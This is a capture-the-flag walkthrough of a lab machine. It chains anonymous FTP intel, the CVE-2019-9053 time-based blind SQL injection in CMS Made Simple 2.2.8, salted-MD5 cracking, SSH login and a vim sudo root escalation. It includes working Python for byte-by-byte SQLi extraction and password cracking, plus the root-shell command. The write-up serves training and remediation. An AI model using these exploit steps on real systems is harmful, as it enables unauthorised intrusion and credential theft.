Overview
Simple CTF chains together anonymous FTP intel, a time-based blind SQL injection
in CMS Made Simple (CVE-2019-9053), and a classic vim sudo NOPASSWD
privilege escalation. The FTP note reveals the target username and confirms a weak
reused password — the SQLi extracts the salted MD5 hash, and cracking it takes seconds.
[Recon]
nmap full scan → ports 21, 80, 2222
Anonymous FTP → note reveals weak/reused password for "mitch"
Gobuster → /simple/ (CMS Made Simple 2.2.8)
[Exploitation]
CVE-2019-9053 (SQLi) → mitch:hash:salt
Crack MD5(salt+pass) → password: secret
[Initial Access]
SSH port 2222 as mitch:secret
cat ~/user.txt → G00d j0b, keep up!
[PrivEsc]
sudo -l → vim NOPASSWD
sudo vim -c ':!/bin/bash' → root shell
cat /root/root.txt → W3ll d0n3. You made it!
Port Scan & Service Discovery
$ sudo nmap -p- --min-rate=5000 -T4 -sS 10.48.185.49
$ sudo nmap -sV -sC -p21,80,2222 10.48.185.49
| Port | Service | Version | Notes |
|---|---|---|---|
| 21/tcp | FTP | vsftpd 3.0.3 | Anonymous login allowed |
| 80/tcp | HTTP | Apache 2.4.18 | robots.txt → rabbit hole |
| 2222/tcp | SSH | OpenSSH 7.2p2 | Non-standard port |
Default nmap (top 1000 ports) finds 2 services — FTP on 21 and HTTP on 80. SSH on port 2222 only appears with a full port scan.
FTP — Anonymous Access & Intel
Anonymous FTP login is allowed. Inside /pub/, a note addressed to “mitch”:
Dammit man... you're the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
Key intel: user mitch reuses a weak password across the CMS and SSH.
Find the CMS password and it’ll be the SSH password too.
Web — CMS Made Simple 2.2.8
$ gobuster dir -u http://10.48.185.49 -w /usr/share/dirb/wordlists/common.txt -t 50 -q
/simple (Status: 301)
/simple/ hosts CMS Made Simple version 2.2.8 — vulnerable to
CVE-2019-9053, an unauthenticated time-based blind SQL injection in the
News module.
CVE-2019-9053 — Time-Based Blind SQLi
The m1_idlist parameter of the News module, reached through /moduleinterface.php,
is concatenated unsanitized into a MySQL query. The page content does not change
with the injected condition, so the attacker injects SLEEP() and infers each byte
of the target value from the response time: a delayed response means the condition
was true. Each byte of the username, salt and hash is recovered this way.
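The extraction loop that the time-based technique implies, as an added example (not the page's pwn_simplectf.sh and not the public PoC): each byte of a column is recovered by a binary search over its ASCII code, and the only thing that touches the network is the oracle. The subquery shape in timed_oracle, the cms_users table name and the FAKE_ROW stand-in are assumptions for illustration; the values in FAKE_ROW are the ones reported on this page so the loop can be run offline.

```python
import re
import time
from typing import Callable

# An oracle answers one yes/no question about the database. Against the
# real target it is a timed HTTP request (timed_oracle); offline it is
# fake_oracle below.
Oracle = Callable[[str], bool]

# MySQL condition on one byte of a column: substr() is 1-indexed and
# returns '' past the end of the value, and ascii('') is 0.
CONDITION = "ascii(substr({column},{pos},1))>{code}"


def extract_column(oracle: Oracle, column: str, max_len: int = 64) -> str:
    """Recover `column` byte by byte, binary-searching each ASCII code.

    Eight queries per byte (one end-of-string check plus a 7-step search)
    instead of one per charset member; the loop stops when ascii(...)>0
    is false, i.e. substr() ran off the end of the value.
    """
    out = []
    for pos in range(1, max_len + 1):
        if not oracle(CONDITION.format(column=column, pos=pos, code=0)):
            break
        lo, hi = 1, 127  # 7-bit ASCII covers usernames, salts and hex digests
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(CONDITION.format(column=column, pos=pos, code=mid)):
                lo = mid + 1  # byte is above mid
            else:
                hi = mid      # byte is mid or below
        out.append(chr(lo))
    return "".join(out)


def timed_oracle(send: Callable[[str], None], sleep_s: float = 3.0) -> Oracle:
    """Turn a request function into an oracle using SLEEP() as the signal.

    `send` must place the payload where the application concatenates it
    into its query (the m1_idlist parameter on this target). The subquery
    wrapping below is an assumed shape, not a verified copy of the PoC.
    """
    def ask(condition: str) -> bool:
        payload = f"(select sleep({sleep_s}) from cms_users where {condition})"
        start = time.monotonic()
        send(payload)
        # Threshold on the injected delay; on a jittery link raise sleep_s
        # or repeat borderline answers rather than lowering the threshold.
        return time.monotonic() - start >= sleep_s
    return ask


def simulate_send(delay_s: float) -> Callable[[str], None]:
    """Constructed stand-in for the network: a request that takes delay_s."""
    return lambda _payload: time.sleep(delay_s)


# Constructed stand-in for the target's cms_users row (values as reported
# on this page) so the extraction logic can run without a target.
FAKE_ROW = {
    "username": "mitch",
    "salt": "1dac0d92e9fa6bb2",
    "password": "0c01f4468bd75d7a84c7eb73846e8d96",
}
_COND_RE = re.compile(r"ascii\(substr\((\w+),(\d+),1\)\)>(\d+)")


def fake_oracle(condition: str) -> bool:
    """Evaluate CONDITION against FAKE_ROW the way MySQL would."""
    column, pos, code = _COND_RE.fullmatch(condition).groups()
    ch = FAKE_ROW[column][int(pos) - 1 : int(pos)]  # '' once past the end
    return (ord(ch) if ch else 0) > int(code)


if __name__ == "__main__":
    for col in ("username", "salt", "password"):
        print(f"{col}: {extract_column(fake_oracle, col)}")
```

Against a live target you would hand timed_oracle a function that sends the payload in m1_idlist and returns when the HTTP response arrives; the 32-character hash then costs about 256 requests at sleep_s seconds each when the condition is true, which is why the sleep value is a trade-off between speed and false readings.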
Username: mitch
Email: admin@admin.com
Salt: 1dac0d92e9fa6bb2
Hash: 0c01f4468bd75d7a84c7eb73846e8d96
Hash format is MD5(salt + password). Cracking is trivial:
$ python3 -c "
import hashlib
salt = '1dac0d92e9fa6bb2'
password = 'secret'
print(hashlib.md5((salt + password).encode()).hexdigest())
"
0c01f4468bd75d7a84c7eb73846e8d96  ✓ match
Password cracked: secret — exactly what the FTP note warned about.
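The check above only confirms a password you already suspect. An added example (not the page's own script) of what you would actually run with just the hash:salt pair: a wordlist loop that tries both salt positions, since md5(salt+pass) is what CMS Made Simple uses but a bare hash and salt do not tell you the order. WORDLIST is a constructed stand-in for a real list such as rockyou.txt; load_wordlist is an assumed helper for reading one.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# Values extracted from the target (as reported on this page).
HASH = "0c01f4468bd75d7a84c7eb73846e8d96"
SALT = "1dac0d92e9fa6bb2"

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "letmein", "mitch", "secret", "qwerty"]

# The two common ways a salt is combined with the password before MD5.
LAYOUTS = {
    "md5(salt+pass)": lambda salt, pw: salt + pw,  # CMS Made Simple
    "md5(pass+salt)": lambda salt, pw: pw + salt,  # other applications
}


def crack_salted_md5(target: str, salt: str,
                     candidates: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Return (password, layout) for the first candidate whose salted MD5
    equals target, or None if the wordlist is exhausted.

    The salt is used as the literal ASCII string stored in the database,
    not hex-decoded; that is what the application itself does here.
    """
    target = target.lower()
    for pw in candidates:
        for layout, combine in LAYOUTS.items():
            digest = hashlib.md5(combine(salt, pw).encode()).hexdigest()
            if digest == target:
                return pw, layout
    return None


def load_wordlist(path: str) -> Iterable[str]:
    """Yield one candidate per line; rockyou has non-UTF-8 lines, so
    decoding errors are ignored rather than aborting the run."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


if __name__ == "__main__":
    # Swap WORDLIST for load_wordlist("/usr/share/wordlists/rockyou.txt")
    # on a real run.
    print(crack_salted_md5(HASH, SALT, WORDLIST))
```

The same job in hashcat is mode 20 (md5($salt.$pass)) with the input written as hash:salt on one line; mode 10 is the pass-then-salt layout if the first run finds nothing.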
SSH — User Shell & Flag
$ ssh -p 2222 mitch@10.48.185.49
Password: secret
$ id
uid=1001(mitch) gid=1001(mitch) groups=1001(mitch)
$ cat ~/user.txt
G00d j0b, keep up!
$ ls /home
mitch  sunbath
Other user in /home: sunbath
vim sudo NOPASSWD → Root
$ sudo -l
User mitch may run the following commands:
    (root) NOPASSWD: /usr/bin/vim
vim is a well-known GTFOBins sudo escalation vector. Spawning a root shell:
$ sudo vim -c ':!/bin/bash'
root@Machine:~# cat /root/root.txt
W3ll d0n3. You made it!
Questions & Answers
| # | Question | Answer |
|---|---|---|
| 1 | How many services on port ≤1000? | 2 (FTP/21, HTTP/80) |
| 2 | What’s running on the higher port? | SSH on port 2222 |
| 3 | CVE being used? | CVE-2019-9053 |
| 4 | What kind of vulnerability? | SQLi (Time-Based Blind) |
| 5 | What’s the password? | secret |
| 6 | Where to login? | SSH port 2222 |
| 7 | User flag? | G00d j0b, keep up! |
| 8 | Username in /home? | sunbath |
| 9 | Leverage for privileged shell? | vim (sudo NOPASSWD) |
| 10 | Root flag? | W3ll d0n3. You made it! |
Attack Chain
Anonymous FTP note → mitch with weak reused password
Gobuster → /simple/ (CMS Made Simple 2.2.8)
CVE-2019-9053 → mitch’s salted MD5 hash → cracked to secret
SSH 2222 as mitch:secret → User flag: G00d j0b, keep up!
sudo vim -c ':!/bin/bash' → Root flag: W3ll d0n3. You made it!
Vulnerabilities
| Finding | Location | Severity | Impact |
|---|---|---|---|
| Unauthenticated Blind SQLi (CVE-2019-9053) | /simple/moduleinterface.php | Critical | Full credential extraction without auth |
| vim sudo NOPASSWD | sudoers config | Critical | Instant root shell via GTFOBins |
| Credential reuse (CMS → SSH) | System-wide | High | CMS compromise cascades to SSH access |
| Weak password (secret) | CMS / SSH | High | Crackable in seconds from hash |
| Anonymous FTP with sensitive files | FTP (21) | Medium | Username and password weakness disclosed |
Takeaways
vim with sudo NOPASSWD is a trivial root vector via :!/bin/bash. Only grant sudo
for binaries that can’t spawn shells, and don’t rely on NOEXEC alone to fix this
one: even with :! blocked, an editor running as root can still read and write
any file, /etc/shadow and /etc/sudoers included. If a user only needs to edit a
specific file as root, grant sudoedit for that file; it edits a copy as the
invoking user and installs it afterwards, so the editor never runs as root.
Full-Chain Exploit Script
The complete chain is automated in pwn_simplectf.sh — recon, FTP
enumeration, time-based SQLi extraction, hash cracking, SSH access, and vim
privilege escalation.
$ chmod +x pwn_simplectf.sh
$ ./pwn_simplectf.sh 10.48.185.49
[+] Username: mitch
[+] Hash: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Salt: 1dac0d92e9fa6bb2
[+] Password cracked: secret
[FLAG] USER FLAG: G00d j0b, keep up!
[FLAG] ROOT FLAG: W3ll d0n3. You made it!
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| gobuster | Web directory brute-force |
| ftp | Anonymous FTP enumeration |
| python3 | Custom time-based blind SQLi extraction script |
| sshpass | Automated SSH login |
| vim | Privilege escalation (GTFOBins sudo vector) |
| pwn_simplectf.sh | Full-chain automated exploit (Bash) |